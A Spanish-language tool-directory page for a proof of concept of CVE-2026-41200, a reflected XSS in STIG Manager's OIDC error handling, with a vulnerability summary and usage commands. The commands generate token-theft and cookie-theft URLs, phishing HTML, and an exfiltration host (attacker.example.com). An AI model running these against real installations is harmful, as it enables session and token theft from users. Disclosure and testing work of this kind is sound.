Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss | Kitploit
Herramientas/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 2 mesesAún no revisado

CVE-2026-41200 — PoC de XSS Reflejado en STIG Manager OIDC

Prueba de concepto de la vulnerabilidad de Cross-Site Scripting (XSS) reflejado en STIG Manager versiones 1.5.10 hasta 1.6.7.

Resumen de la vulnerabilidad

Existe una vulnerabilidad de XSS reflejado en el código de manejo de errores de autenticación OIDC de la aplicación web STIG Manager. Los parámetros de consulta error y error_description devueltos por el proveedor OIDC se escriben directamente en el DOM mediante innerHTML sin escape HTML. Un atacante que pueda crear una URL maliciosa y convencer a un usuario para que la siga puede ejecutar JavaScript arbitrario en el contexto de la aplicación.

La vulnerabilidad es más grave cuando el usuario objetivo tiene una sesión activa de STIG Manager en otra pestaña del navegador: el código inyectado puede comunicarse con el SharedWorker que gestiona el token de acceso, lo que permite realizar solicitudes API autenticadas en nombre de la víctima.

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (ALTO)
  • Afectado: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • Corregido: v1.6.8
  • Aviso: GHSA-wg33-j3rv-jq72
  • Artículo: hunt-benito.com

Uso

root@kitploit:~
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html

# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos e investigación de seguridad autorizada.

  • Úsala únicamente contra instalaciones que poseas o para las que tengas autorización explícita de prueba.
  • El acceso no autorizado a sistemas informáticos es ilegal en la mayoría de las jurisdicciones.
  • Los autores no asumen ninguna responsabilidad por el mal uso de esta herramienta.
Descargar herramienta